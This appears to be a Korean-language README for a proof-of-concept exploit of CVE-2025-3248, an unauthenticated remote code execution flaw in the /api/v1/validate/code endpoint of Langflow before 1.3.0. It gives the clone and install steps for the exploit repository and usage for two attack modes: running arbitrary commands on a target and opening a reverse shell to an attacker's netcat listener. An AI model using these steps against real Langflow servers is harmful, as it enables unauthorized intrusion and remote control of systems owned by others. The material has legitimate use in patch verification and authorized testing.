
CVE-2025-3248용 PoC: /api/v1/validate/code를 통한 Langflow < 1.3.0의 인증되지 않은 RCE
Langflow의 코드 검증 엔드포인트에서 원격 코드 실행 취약점을 시연하는 개념 증명(PoC) 익스플로잇입니다. 이 취약점은 Langflow 1.3.0 이전 버전에 영향을 미치며, 인증되지 않은 공격자가 조작된 HTTP 요청을 통해 임의 코드를 실행할 수 있게 합니다.
| CVE ID | CVE-2025-3248 |
|---|---|
| 영향받는 버전 | < 1.3.0 |
| 공격 벡터 | 원격 |
| 인증 필요 | 아니요 |
| 영향 | 원격 코드 실행 (RCE) |
| 엔드포인트 | /api/v1/validate/code |
requestscoloramagit clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
pip install requests colorama
이 익스플로잇은 두 가지 작동 모드를 지원합니다:
대상 시스템에서 단일 명령을 실행합니다:
python3 cve-2025-3248.py cmd <target_url> "<command>"
예시:
python3 cve-2025-3248.py cmd http://target:7860 "id"
대화형 리버스 셸을 생성합니다:
nc -lvnp 4444
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>
예시:
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444